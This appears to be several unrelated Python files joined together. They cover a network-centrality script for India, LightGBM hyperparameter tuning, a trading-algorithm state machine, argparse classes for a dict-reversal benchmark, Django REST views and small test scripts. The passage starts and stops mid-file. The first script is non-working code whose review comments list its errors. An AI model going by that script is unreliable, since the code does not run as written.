    """Compute and announce the current power centers (degree only)."""
    # NOTE(review): this assigns a local, not the module-level power_d (no
    # ``global`` statement), and degree_centrality() currently returns None.
    power_d = degree_centrality()
    #power_c = closeness_centrality()
    #power_b = betweenness_centrality()
    message = "The initial power centers are: "
    printer(message)
def current_indian_power():
    """Report India's centrality."""
    # NOTE(review): ``india`` is not defined in this scope (it is a local of
    # link_prediction), so calling this raises NameError.
    power_d = degree_centrality(india)
    #power_c = closeness_centrality(india)
    #power_b = betweenness_centrality(india)
    message = "The centraility of India is: "
    printer(message)
def link_prediction():
    """Enumerate hypothetical new relations for India and report the
    centrality change for each (single links and pairs of links).

    Fixes over the original: ``range(0:len)`` / ``range(1:len)`` were invalid
    slice-style range calls, ``else if`` is not Python (must be ``elif``), and
    the node count was named ``len``, shadowing the builtin.

    NOTE(review): indexing a DataFrame as ``df[row, col]`` is not valid
    pandas; this mirrors the original intent but still needs ``df.iloc`` or
    similar -- TODO confirm the intended access pattern.
    """
    india = 8
    n_nodes = 23  # was named ``len``, shadowing the builtin
    for fix in range(n_nodes):  # fixed: was ``range(0:len)``
        if fix == india:
            continue
        elif fix >= 1:  # fixed: was ``else if``
            if df[india, fix] == 1:
                continue
            else:
                # Temporarily add the (india, fix) link ...
                df[india, fix] = 1
                fixed = 1
                for col in range(1, n_nodes):  # fixed: was ``range(1:len)``
                    if col == india:
                        continue
                    if df[india, col] == 1:
                        continue
                    else:
                        # ... then try each second link (india, col).
                        df[india, col] = 1
                        find_new_powers(india, col, fix)
                        df[india, col] = 0
                if fixed == 1:
                    # Undo the temporary first link.
                    df[india, fix] = 0
    #changed_powers()
def find_new_powers(india,col,fix):
    """Report the centrality India would gain from the hypothetical link(s)."""
    power_d = degree_centrality(india)
    #power_c = closeness_centrality(india)
    #power_b = betweenness_centrality(india)
    # NOTE(review): ``counter`` is undefined here (NameError), and string+int
    # concatenation would fail even if it were defined as a number.
    message = "Case:"+counter+" If india makes relations with "
    if fix == 0:
        #do this
        # NOTE(review): ``.toString()`` is not Python -- str(...) was likely meant.
        message = message + df[0,col].toString()
    else:
        #do that
        message = message + df[0,col].toString + "and" + df[0,fix].toString
    # NOTE(review): this assignment discards everything built above --
    # presumably ``message +=`` was intended.
    message = ", its new centrality will be: "
    printer(message)
def changed_powers():
    """Recompute the power centers after a hypothetical change."""
    # NOTE(review): because power_d is assigned later in this function it is
    # treated as a local, so reading it here raises UnboundLocalError; also
    # the commented ``b`` line copies power_c rather than power_b.
    d = power_d
    #c = power_c
    #b = power_c
    power_d = degree_centrality()
    #power_c = closeness_centrality()
    #power_b = betweenness_centrality()
    message = "If India does so, the power centers of the world will change to: "
    printer(message)
def printer(message):
    """Print the report message followed by the centrality details."""
    print(message)
    # NOTE(review): ``power`` is undefined (presumably power_d was meant), so
    # this line raises NameError; a numeric value would also need str()
    # before concatenation.
    print("Degree centrality = "+power+" of node "+node_d)
    #print("Closeness centrality = "+power+" of node "+node_c)
    #print("Betweenness centrality = "+power+" of node "+node_b)
def degree_centrality():
    """Placeholder: report the node with the maximum degree (unimplemented).

    The docstring also gives this otherwise-empty body a statement so the
    function parses.
    """
    #print max degree
    #print column header of max sum
def degree_centrality(india):
    """Placeholder: report India's degree (unimplemented).

    NOTE(review): this redefines ``degree_centrality`` -- Python has no
    overloading, so this definition replaces the zero-argument one above and
    calls like ``degree_centrality()`` will raise TypeError.
    """
    #print india's degree
    #print col sum of india
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 24 17:33:38 2019
@author: chenhaibin
"""
import time
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import lightgbm as lgb
from sklearn.model_selection import StratifiedKFold
from sklearn.preprocessing import LabelEncoder
#input
train_data = pd.read_csv("train_dataset.csv")
test_data = pd.read_csv("test_dataset.csv")
#feature_engineering
# Replace the original column headers with English names; 'score' is the
# regression target and only exists in the training set.
train_data.columns = ['uid','true_name_flag','age','is_uni_student_flag','black_list_flag',\
                     '4g_unhealth_flag','net_age_till_now','top_up_month_diff','top_up_amount',\
                     'recent_6month_avg_use','total_account_fee','curr_month_balance',\
                     'curr_overdue_flag','cost_sensitivity','connect_num','freq_shopping_flag',\
                     'recent_3month_shopping_count','wanda_flag','sam_flag','movie_flag',\
                     'tour_flag','sport_flag','online_shopping_count','express_count',\
                     'finance_app_count','video_app_count','flight_count','train_count',\
                     'tour_app_count','score']
test_data.columns = train_data.columns[:-1]
# Drop the five least-useful features (plus uid and the score label).
train_data_use = train_data.drop(['uid','score','is_uni_student_flag','true_name_flag','sam_flag','black_list_flag','wanda_flag'], axis=1)
test_data_use = test_data.drop(['uid','is_uni_student_flag','true_name_flag','sam_flag','black_list_flag','wanda_flag'], axis=1)
# Age at network sign-up (per the original note, this feature cost 0.01).
def get_begin_age(a, b):
    """Return the age at sign-up: current age minus tenure (b is in months)."""
    months_per_year = 12
    return a - b / months_per_year
train_data['net_age_begin'] = train_data.apply(lambda row: get_begin_age(row['age'], row['net_age_till_now']), axis=1)
def pay_remain_ratio(a, b):
    """Return a / b, treating a zero denominator as a ratio of 0."""
    return a / b if b != 0 else 0
# Ratio of the post-payment balance to the monthly fee.
train_data['after_pay_remain_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['curr_month_balance'],row['total_account_fee']), axis=1)
# Ratio of the post-payment balance to the 6-month average spend.
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['curr_month_balance'],row['recent_6month_avg_use']), axis=1)
# Below: divide each remaining pair of the money columns.
# NOTE(review): all four assignments below reuse the column name
# 'after_pay_remain_average_ratio', so each overwrites the previous one and
# only the last ratio (fee / top-up) survives -- confirm this is intended.
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['top_up_amount'],row['recent_6month_avg_use']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['total_account_fee'],row['recent_6month_avg_use']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['top_up_amount'],row['curr_month_balance']), axis=1)
train_data['after_pay_remain_average_ratio'] = train_data.apply(lambda row: pay_remain_ratio(row['total_account_fee'],row['top_up_amount']), axis=1)
# A non-integer top-up amount presumably indicates an online recharge.
train_data['charge_online'] = train_data['top_up_amount'].apply(lambda x: 1 if x % 1 != 0 else 0)
def feature_count(data, features=[]):
    """Append a column counting occurrences of each ``features`` combination.

    The new column is named 'count_<f1>_<f2>...' with any 'add_' prefixes
    stripped from the feature names.  Duplicate feature names are rejected
    with a message and the frame is returned unchanged.
    """
    if len(set(features)) != len(features):
        print('equal feature !!!!')
        return data
    suffixes = [name.replace('add_', '') for name in features]
    new_feature = '_'.join(['count'] + suffixes)
    # Drop a stale column of the same name, if any (this mutates the input
    # frame, exactly as before).
    try:
        del data[new_feature]
    except:
        pass
    group_sizes = (
        data.groupby(features).size().reset_index().rename(columns={0: new_feature})
    )
    return data.merge(group_sizes, 'left', on=features)
# Frequency ("count") features over single columns.
train_data = feature_count(train_data, ['top_up_amount'])
train_data = feature_count(train_data, ['net_age_till_now']) #go
train_data = feature_count(train_data, ['age']) #go
train_data = feature_count(train_data, ['top_up_month_diff'])
train_data = feature_count(train_data, ['connect_num']) #go
# Pairwise difference features between the money-related columns.
train_data['diff_between_average_acount'] = train_data['recent_6month_avg_use'] - train_data['total_account_fee']
train_data['diff_between_average_up'] = train_data['recent_6month_avg_use'] - train_data['top_up_amount']
train_data['diff_between_curr_up'] = train_data['curr_month_balance'] - train_data['top_up_amount']
train_data['diff_between_fee_up'] = train_data['total_account_fee'] - train_data['top_up_amount']
# NOTE(review): the next line recomputes 'diff_between_curr_up' with the
# identical formula (redundant), and the line after it overwrites
# 'diff_between_average_up' with a different formula, discarding the value
# assigned above -- confirm which definitions are intended.
train_data['diff_between_curr_up'] = train_data['curr_month_balance'] - train_data['top_up_amount']
train_data['diff_between_average_up'] = train_data['curr_month_balance'] - train_data['recent_6month_avg_use']
#average
# NOTE(review): despite the name, this is half the *difference*, not a mean.
train_data['mean_fee'] = (train_data['recent_6month_avg_use'] - train_data['total_account_fee']) / 2
#parameter
'''
params = {
'learning_rate': 0.01,
'boosting_type': 'gbdt',
'objective': 'regression_l1',
'metric': 'mae',
'feature_fraction': 0.6,
'bagging_fraction': 0.8,
'bagging_freq': 2,
'num_leaves': 31,
'verbose': -1,
'max_depth': 5,
'lambda_l2': 5, 'lambda_l1': 0
}
'''
# LightGBM L1-regression settings (values chosen by the tuning passes below).
params = {
    'learning_rate': 0.01,
    'boosting_type': 'gbdt',
    'objective': 'regression_l1',
    'metric': 'mae',
    'max_depth': 5,
    'num_leaves': 27,
    'min_sum_hessian_in_leaf': 0.0001,
    'min_data_in_leaf': 24
}
min_merror = float('Inf')
best_params = {}
train_label = train_data['score']
# NOTE(review): rebinding ``train_data`` to an lgb.Dataset shadows the
# DataFrame used above; moreover the engineered features were added to the
# DataFrame, but training uses ``train_data_use`` (created before the feature
# engineering), so those features never reach the model -- confirm intended.
train_data = lgb.Dataset(train_data_use, train_label, silent=True)
'''
print("调参1:提高准确率")
min_merror = float('Inf')
#for max_depth in range(3,7,1):
#for num_leaves in range(10,60,3):
for max_depth in range(4,7,1):
for num_leaves in range(25,35,2):
params['num_leaves'] = num_leaves
params['max_depth'] = max_depth
cv_results = lgb.cv(params,
train_data,
seed=89,
early_stopping_rounds=100,
verbose_eval=True,
num_boost_round=10000 #默认10
)
mean_merror = pd.Series(cv_results['l1-mean']).min()
if mean_merror < min_merror:
min_merror = mean_merror
best_params['num_leaves'] = num_leaves
best_params['max_depth'] = max_depth
params['num_leaves'] = best_params['num_leaves']
params['max_depth'] = best_params['max_depth']
print(best_params)
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
'''
{'num_leaves': 27, 'max_depth': 5}
best n_estimators: 3650
best cv score: 14.788533076
'''
'''
print("调参2:降低过拟合")
for min_sum_hessian_in_leaf in [1e-4,1e-3,1e-2]:
for min_data_in_leaf in range(12,32,4):
#for min_sum_hessian_in_leaf in [1e-3]:
#for min_data_in_leaf in range(20,21,1):
params['min_sum_hessian_in_leaf'] = min_sum_hessian_in_leaf
params['min_data_in_leaf'] = min_data_in_leaf
cv_results = lgb.cv(
params,
train_data,
seed=89,
early_stopping_rounds=100,
verbose_eval=True,
num_boost_round=10000
)
mean_merror = pd.Series(cv_results['l1-mean']).min()
boost_rounds = pd.Series(cv_results['l1-mean']).idxmin()
if mean_merror < min_merror:
min_merror = mean_merror
best_params['min_sum_hessian_in_leaf']= min_sum_hessian_in_leaf
best_params['min_data_in_leaf'] = min_data_in_leaf
params['min_data_in_leaf'] = best_params['min_data_in_leaf']
params['min_sum_hessian_in_leaf'] = best_params['min_sum_hessian_in_leaf']
print(best_params)
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
'''
{'min_sum_hessian_in_leaf': 0.0001, 'min_data_in_leaf': 24}
best n_estimators: 2921
best cv score: 14.7871626736
'''
print("调参3:降低过拟合")
# Tuning pass 3 (reduce overfitting): grid-search the sampling settings and
# keep the combination with the lowest mean l1 from lgb.cv.
for feature_fraction in [0.5,0.6,0.7]:
    for bagging_fraction in [0.7,0.8,0.9]:
        for bagging_freq in range(0,5,1):
            params['feature_fraction'] = feature_fraction
            params['bagging_fraction'] = bagging_fraction
            params['bagging_freq'] = bagging_freq
            cv_results = lgb.cv(
                params,
                train_data,
                seed=89,
                early_stopping_rounds=100,
                verbose_eval=True,
                num_boost_round=10000
            )
            mean_merror = pd.Series(cv_results['l1-mean']).min()
            boost_rounds = pd.Series(cv_results['l1-mean']).idxmin()  # NOTE(review): unused
            if mean_merror < min_merror:
                min_merror = mean_merror
                best_params['feature_fraction'] = feature_fraction
                best_params['bagging_fraction'] = bagging_fraction
                best_params['bagging_freq'] = bagging_freq
params['feature_fraction'] = best_params['feature_fraction']
params['bagging_fraction'] = best_params['bagging_fraction']
params['bagging_freq'] = best_params['bagging_freq']
print(best_params)
# NOTE(review): cv_results here is from the *last* grid cell tried, not
# necessarily the best-scoring one.
print('best n_estimators:', len(cv_results['l1-mean']))
print('best cv score:', cv_results['l1-mean'][-1])
'''
cv_pred = np.zeros(test_data.shape[0])
valid_best_l2_all = 0
feature_importance_df = pd.DataFrame()
count = 0
for i, (train_fold, validate) in enumerate(kf):
print('fold: ',i, ' training')
X_train, X_validate, label_train, label_validate = \
train_data_use.iloc[train_fold, :], train_data_use.iloc[validate, :], \
train_label[train_fold], train_label[validate]
dtrain = lgb.Dataset(X_train, label_train)
dvalid = lgb.Dataset(X_validate, label_validate, reference=dtrain)
bst = lgb.train(params, dtrain, num_boost_round=10000, valid_sets=dvalid, verbose_eval=-1,early_stopping_rounds=50)
cv_pred += bst.predict(test_data_use, num_iteration=bst.best_iteration)
valid_best_l2_all += bst.best_score['valid_0']['l1']
fold_importance_df = pd.DataFrame()
fold_importance_df["feature"] = list(X_train.columns)
fold_importance_df["importance"] = bst.feature_importance(importance_type='gain', iteration=bst.best_iteration)
fold_importance_df["fold"] = count + 1
feature_importance_df = pd.concat([feature_importance_df, fold_importance_df], axis=0)
count += 1
cv_pred /= NFOLDS
valid_best_l2_all /= NFOLDS
print('cv score for valid is: ', 1/(1+valid_best_l2_all))
''' |
# Copyright 2018 QuantInsti Quantitative Learnings Pvt Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
"""
from transitions import Machine
from blueshift.utils.decorators import blueprint
from blueshift.utils.types import MODE, STATE
from blueshift.configs.runtime import blueshift_run_get_name
@blueprint
class AlgoStateMachine():
    """
    An implementation of state machine rules for an algorithm. State
    changes are triggered by two sets of events. One is the clock tick.
    The second is any command from channel (i.e. user interaction,
    only for live mode).
    Note:
        Clock transitions: ignoring state altering commands, any
        backtest can move like dormant -> startup -> before trading
        start -> trading bar -> after trading hours -> dormant.
        For a live algo, if started on a trading hour, it will be
        dormant -> startup -> before trading start -> trading bar ->
        after trading hours -> heartbeat -> before trading -> trading
        bar -> after trading hours -> heartbeat and so on. If started
        on a non-trading hour, it can jump from initialize to heartbeat.
        So dormant -> initialize -> heartbeat -> before start -> heart
        beat -> trading bars -> after trading -> heartbeat and so on.
        On stop from any signal it goes to `stopped` state.
    Args:
        ``name (str)``: A name for the state machine
        ``mode (int)``: Mode of the machine (live or backtest)
    """
    states = [s for s, v in STATE.__members__.items()]
    """ complete set of possible machine states. """
    def __init__(self, *args, **kwargs):
        # Default the machine name to the current run's name; default mode
        # is backtest.
        self.name = kwargs.pop("name",blueshift_run_get_name())
        self.mode = kwargs.pop("mode", MODE.BACKTEST)
        self._paused = False
        # Legal trigger/source/dest table handed to transitions.Machine.
        transitions = [
            {'trigger':'fsm_initialize','source':'STARTUP','dest':'INITIALIZED'},
            {'trigger':'fsm_before_trading_start','source':'HEARTBEAT','dest':'BEFORE_TRADING_START'},
            {'trigger':'fsm_before_trading_start','source':'INITIALIZED','dest':'BEFORE_TRADING_START'},
            {'trigger':'fsm_before_trading_start','source':'AFTER_TRADING_HOURS','dest':'BEFORE_TRADING_START'},
            {'trigger':'fsm_handle_data','source':'BEFORE_TRADING_START','dest':'TRADING_BAR'},
            {'trigger':'fsm_handle_data','source':'HEARTBEAT','dest':'TRADING_BAR'},
            {'trigger':'fsm_handle_data','source':'TRADING_BAR','dest':'TRADING_BAR'},
            {'trigger':'fsm_after_trading_hours','source':'TRADING_BAR','dest':'AFTER_TRADING_HOURS'},
            {'trigger':'fsm_after_trading_hours','source':'HEARTBEAT','dest':'AFTER_TRADING_HOURS'},
            {'trigger':'fsm_heartbeat','source':'AFTER_TRADING_HOURS','dest':'HEARTBEAT'},
            {'trigger':'fsm_heartbeat','source':'BEFORE_TRADING_START','dest':'HEARTBEAT'},
            {'trigger':'fsm_heartbeat','source':'INITIALIZED','dest':'HEARTBEAT'},
            {'trigger':'fsm_heartbeat','source':'HEARTBEAT','dest':'HEARTBEAT'},
            {'trigger':'fsm_heartbeat','source':'TRADING_BAR','dest':'HEARTBEAT'},
            {'trigger':'fsm_analyze','source':'*','dest':'STOPPED'},
            # NOTE(review): this unconditional fsm_pause entry is registered
            # before the conditional one added via add_transition below --
            # confirm which of the two is intended to take effect.
            {'trigger':'fsm_pause','source':'*','dest':'PAUSED'}]
        self.machine = Machine(model=self,
                               states=AlgoStateMachine.states,
                               transitions=transitions,
                               initial="STARTUP")
        # Pausing is only allowed while running; resuming restarts the cycle.
        self.machine.add_transition('fsm_pause','*','PAUSED',
                                    conditions = 'is_running',
                                    after='set_pause')
        self.machine.add_transition('fsm_resume','PAUSED','STARTUP',
                                    before='reset_pause')
        self.machine.add_transition('fsm_stop','*','STOPPED')
    def is_running(self):
        """ returns True if we are in a running state """
        return not self._paused
    def set_pause(self):
        """ set the machine state to pause """
        self._paused = True
    def reset_pause(self):
        """ un-pause the state of the machine """
        self._paused = False
|
from reverse_dict.methods import (Method01Py2, Method01Py3, Method02Py2,
Method02Py3, Method03Py2, Method03Py3)
from reverse_dict.config import cfg
class Argument(object):
    """Description of a single argparse argument.

    Gathers the positional option name (or the short/long option strings)
    into ``self.args`` and any extra keyword arguments into ``self.kwargs``
    so a caller can forward both to ``parser.add_argument``.
    """

    def __init__(self, option_name, short_option, long_option, **kwargs):
        self.option_name = option_name
        self.short_option = short_option
        self.long_option = long_option
        # IMPORTANT: a positional option name takes precedence; the short
        # and long options are ignored when it is given.
        if option_name:
            self.args = option_name
        else:
            self.args = list(filter(None, (short_option, long_option)))
        self.kwargs = dict(kwargs)
class MethodNameArgument(Argument):
    """`-m/--method_name`: which dict-reversal implementation to run."""
    __argument_name__ = 'method_name'
    __common_option__ = False  # Python-3-only option (not shared with the Py2 runner)
    __default_value__ = Method01Py3.__method_name__
    # NOTE: the format() arguments interleave each method's name with the
    # name of the Python 2 method it mirrors, matching the {} order below.
    __help_arg__ = '''\
Name of the method that reverses a dict's keys and values:
{}: makes use of dict comprehension, and the dict must contain
unique values. Works on Python 2.7
{}: the reversed dict stores as values a list of all the keys
associated with the same value in the original dict,
and the dict doesn't contain unique values. Works on
Python 2.7
{}: makes use of map(reversed, iter), and the type and order of the
original dict are preserved (if for example it is an
OrderedDict). Works on Python 2.7
{}: Python 3 version of {}
{}: Python 3 version of {}
{}: Python 3 version of {}
(default: {})
'''.format(Method01Py2.__method_name__, Method02Py2.__method_name__,
           Method03Py2.__method_name__, Method01Py3.__method_name__,
           Method01Py2.__method_name__, Method02Py3.__method_name__,
           Method02Py2.__method_name__, Method03Py3.__method_name__,
           Method03Py2.__method_name__, __default_value__)

    def __init__(self, option_name=None, short_option='-m',
                 long_option='--{}'.format(__argument_name__),
                 default=__default_value__, help=__help_arg__, **kwargs):
        super(MethodNameArgument, self).__init__(
            option_name, short_option, long_option, default=default, help=help,
            **kwargs)
class NumberItemsArgument(Argument):
    """`-ni/--number_items`: size of the dictionary to build (int)."""
    __argument_name__ = 'number_items'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = 1000
    __help_arg__ = 'Number of items in the dictionary. ' \
                   '(default: {})'.format(__default_value__)

    def __init__(self, option_name=None, short_option='-ni',
                 long_option='--{}'.format(__argument_name__),
                 default=__default_value__, type=int, help=__help_arg__, **kwargs):
        super(NumberItemsArgument, self).__init__(
            option_name, short_option, long_option, default=default, type=type,
            help=help, **kwargs)
class NumberTimesArgument(Argument):
    """`-nt/--number_times`: how many timed reversal runs to average (int)."""
    __argument_name__ = 'number_times'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = 10
    __help_arg__ = '''Number of times the dictionary's keys and values will be reversed.
Each time, the run time of the reversal is computed and at the end
of all the tries, the average run time is computed. (default: {})
'''.format(__default_value__)

    def __init__(self, option_name=None, short_option='-nt',
                 long_option='--{}'.format(__argument_name__),
                 default=__default_value__, type=int, help=__help_arg__, **kwargs):
        super(NumberTimesArgument, self).__init__(
            option_name, short_option, long_option, default=default, type=type,
            help=help, **kwargs)
class PrecisionArgument(Argument):
    """`-p/--precision`: decimal places used when displaying results (int)."""
    __argument_name__ = 'precision'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = 8
    __help_arg__ = 'Decimal precision used when displaying the results. ' \
                   '(default: {})'.format(__default_value__)

    def __init__(self, option_name=None, short_option='-p', type=int,
                 long_option='--{}'.format(__argument_name__),
                 default=__default_value__, help=__help_arg__, **kwargs):
        super(PrecisionArgument, self).__init__(
            option_name, short_option, long_option, default=default, type=type,
            help=help, **kwargs)
class PrintDictsArgument(Argument):
    """`-pd/--print_dicts`: flag; print both dictionaries when done."""
    __argument_name__ = 'print_dicts'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = False
    __help_arg__ = 'Print the original and reversed dictionaries at the end. ' \
                   '(default: {})'.format(__default_value__)

    def __init__(self, option_name=None, short_option='-pd',
                 long_option='--{}'.format(__argument_name__), action='store_true',
                 help=__help_arg__, **kwargs):
        super(PrintDictsArgument, self).__init__(
            option_name, short_option, long_option, action=action, help=help,
            **kwargs)
class UseItemsArgument(Argument):
    """`-ui/--use_items`: flag; on Python 2 use dict.items() over iteritems()."""
    __argument_name__ = 'use_items'
    __common_option__ = False  # Python-2-only knob
    __default_value__ = False
    __help_arg__ = '''When working on Python 2, use dict.items() instead of the more efficient
dict.iteritems() (default: {}.)'''.format(__default_value__)

    def __init__(self, option_name=None, short_option='-ui',
                 long_option='--{}'.format(__argument_name__), action='store_true',
                 help=__help_arg__, **kwargs):
        super(UseItemsArgument, self).__init__(
            option_name, short_option, long_option, action=action, help=help,
            **kwargs)
class UseNonUniquesArgument(Argument):
    """`-unu/--use_non_uniques`: flag; seed the dict with non-unique values."""
    __argument_name__ = 'use_non_uniques'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = False
    __help_arg__ = 'Initialize the original dictionary with non-unique values. ' \
                   '(default: {})'.format(__default_value__)

    def __init__(self, option_name=None, short_option='-unu',
                 long_option='--{}'.format(__argument_name__), action='store_true',
                 help=__help_arg__, **kwargs):
        super(UseNonUniquesArgument, self).__init__(
            option_name, short_option, long_option, action=action, help=help,
            **kwargs)
class UseOrderedDictArgument(Argument):
    """`-uod/--use_ordered_dict`: flag; use OrderedDict for both dicts."""
    __argument_name__ = 'use_ordered_dict'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __default_value__ = False
    __help_arg__ = '''Use OrderedDict instead of dict for both dictionaries (original and inverse)
(default: {}).'''.format(__default_value__)

    def __init__(self, option_name=None, short_option='-uod',
                 long_option='--{}'.format(__argument_name__), action='store_true',
                 help=__help_arg__, **kwargs):
        super(UseOrderedDictArgument, self).__init__(
            option_name, short_option, long_option, action=action, help=help,
            **kwargs)
class UseSetDefaultArgument(Argument):
    """`-usd/--use_setdefault`: flag; populate via dict.setdefault() not get()."""
    __argument_name__ = 'use_setdefault'
    __common_option__ = False
    __default_value__ = False
    __help_arg__ = '''Use dict.setdefault() instead of dict.get() when populating the dictionary.
(default: {})'''.format(__default_value__)

    def __init__(self, option_name=None, short_option='-usd',
                 long_option='--{}'.format(__argument_name__), action='store_true',
                 help=__help_arg__, **kwargs):
        super(UseSetDefaultArgument, self).__init__(
            option_name, short_option, long_option, action=action, help=help,
            **kwargs)
class VersionArgument(Argument):
    """`-v/--version`: print the program version (argparse 'version' action)."""
    __argument_name__ = 'version'
    __common_option__ = True  # shared by the Python 2 and Python 3 methods
    __help_arg__ = "Show program's version and exit."

    def __init__(self, option_name=None, short_option='-v',
                 long_option='--{}'.format(__argument_name__), action='version',
                 version='%(prog)s {}'.format(cfg.version), help=__help_arg__,
                 **kwargs):
        super(VersionArgument, self).__init__(
            option_name, short_option, long_option, action=action,
            version=version, help=help, **kwargs)
# TODO: specify what it is meant by common. Options that are common to both Python 3
# and Python 2 methods
# TODO: add also a get_all_arguments() function to be used in the main script
def get_common_arguments():
    """Instantiate every Argument shared by the Python 2 and Python 3 runners."""
    # TODO: make use of `__common_option__` to know which argument to add to the list
    common = [
        NumberItemsArgument(),
        NumberTimesArgument(),
        PrecisionArgument(),
        PrintDictsArgument(),
        UseNonUniquesArgument(),
        UseOrderedDictArgument(),
        UseSetDefaultArgument(),
        VersionArgument(),
    ]
    return common
|
# Week 2
# Question 1
def text_handle(n):
    """Collapse every run of whitespace in *n* to a single space, trimming the ends."""
    words = n.split()
    return " ".join(words)
sample_text = "Hello my friend"
print(text_handle(sample_text))
# Time complexity: O(n) — split() and join() each scan the whole string
# (the original note claimed O(1), which is incorrect).
# Space complexity: O(n) for the intermediate list of words.
|
#!/usr/bin/env python3
"""
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* Audiophiles Music Manager Build 20180119 VER0.0.0PREALPHA *
* (C)2017 Mattijs Snepvangers pegasus.ict@gmail.com *
* test.py Package Tester VER0.0.0PREALPHA *
* License: MIT Please keep my name in the credits *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
"""
### Defining variables...
ui_style = "dialog"  # UI backend name handed to the UserInterface constructor below
ui_language = "en"  # interface language code
AMM_TITLE = "Audiophiles Music Manager"  # application title string
# my_ui = None
# amm_config = dict()
# db_handle = None
# import sys
# import time
# # # load my own code
# import lib.fsops as fsops
# import lib.conf as conf
import lib.ui as ui
# import lib.debugger
# import lib.db_agent as dba
# import lib.afops as afops
# import lib.inetc as inetc
# import lib.daemonizer as daemonizer
# import lib.reportbuilder as reportbuilder
def inclusive_range(*args):
    """Generator like range(), but the stop value itself is yielded.

    Accepts (stop), (start, stop) or (start, stop, step).
    Raises TypeError for zero arguments or more than three.
    """
    numargs = len(args)
    if numargs < 1:
        raise TypeError('Requires at least one argument')
    if numargs == 1:
        start, stop, step = 0, args[0], 1
    elif numargs == 2:
        (start, stop) = args
        step = 1
    elif numargs == 3:
        (start, stop, step) = args
    else:
        # BUG FIX: the original raise was missing its closing parenthesis,
        # which made the whole module a SyntaxError.
        raise TypeError(
            'inclusive_range expected at most 3 arguments, got {}.'.format(numargs))
    i = start
    while i <= stop:
        yield i  # pass on value and continue with loop
        i += step
def main():
    """Smoke-test the dialog user interface by showing one announcement."""
    print("testing...")
    # BUG FIX: `import lib.ui as ui` binds the name `ui`, not `lib`,
    # so `lib.ui.UserInterface` raised NameError.
    my_ui = ui.UserInterface('dialog')
    # BUG FIX: `kwargs` was used without ever being defined.
    kwargs = {}
    kwargs['message'] = "hello"
    kwargs['title'] = "test title"
    try:
        result = my_ui.announce(**kwargs)
    except Exception as e:  # BUG FIX: Python 2 `except Exception, e` syntax
        print(str(e))       # BUG FIX: Python 2 `print str(e)` statement


# standard boilerplate
if __name__ == '__main__':
    main()
|
from django.shortcuts import render
from django.core import serializers
from rest_framework import status, viewsets, views
from .models import Category, Product, Order, Highlight, HighlightBig
from rest_framework.response import Response
from rest_framework.decorators import api_view
from .serializers import CategorySerializer, ProductSerializer , OrderSerializer, HighlightSerializer
from rest_framework.parsers import JSONParser
from rest_framework import generics, permissions, mixins, viewsets
from django.db.models import Count, Sum
from django.core.paginator import Paginator
from rest_framework.pagination import PageNumberPagination
class CategoryViewSet(generics.GenericAPIView, mixins.ListModelMixin,):
    """Read-only endpoint: GET returns the list of all categories."""
    queryset = Category.objects.all()
    serializer_class = CategorySerializer

    def get(self, request, *args, **kwargs):
        return self.list(request, *args, **kwargs)
class OrderViewSet(generics.GenericAPIView, mixins.ListModelMixin, mixins.CreateModelMixin,):
    """Authenticated endpoint: GET lists orders, POST creates one."""
    permission_classes = [
        permissions.IsAuthenticated,
    ]
    queryset = Order.objects.all()
    serializer_class = OrderSerializer

    def get(self, request, *args, **kwargs):
        return self.list(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        return self.create(request, *args, **kwargs)
class ProductViewSet(generics.GenericAPIView,
                     mixins.ListModelMixin,
                     mixins.CreateModelMixin,
                     ):
    """GET lists products.

    NOTE(review): CreateModelMixin is mixed in but no post() is defined, so
    POST is never routed — confirm whether creation was meant to be exposed.
    """
    # permission_classes = [
    #     permissions.IsAuthenticated,
    # ]
    queryset = Product.objects.all()
    serializer_class = ProductSerializer

    def get(self, request, *args, **kwargs):
        return self.list(request, *args, **kwargs)
class HighlightViewSet(generics.GenericAPIView,
                       mixins.ListModelMixin,
                       mixins.CreateModelMixin,
                       ):
    """GET lists highlights.

    NOTE(review): CreateModelMixin is included but no post() exists — same
    apparent inconsistency as ProductViewSet; confirm intent.
    """
    queryset = Highlight.objects.all()
    serializer_class = HighlightSerializer

    def get(self, request, *args, **kwargs):
        return self.list(request, *args, **kwargs)
class ProductDetailViewSet(generics.RetrieveUpdateDestroyAPIView):
    """Single-product endpoint: GET/PUT/PATCH/DELETE by primary key."""
    queryset = Product.objects.all()
    serializer_class = ProductSerializer
|
import openpyxl
import numpy as np
import math
import matplotlib.pyplot as plt
from numpy.linalg import inv
# Load the 10K-sample ALARM-network spreadsheet.
alarmdata = openpyxl.load_workbook('C:\\Users\\aviza\\Desktop\\CSE 674\\Project 1\\alarm10K.xlsx')
# FIX: Workbook.get_sheet_by_name() is deprecated in openpyxl;
# dict-style access returns the same worksheet.
aladata = alarmdata['alarm10K']
individualp = []  # per-variable pdf values, filled by the main loop below
def find_pdf(a, b):
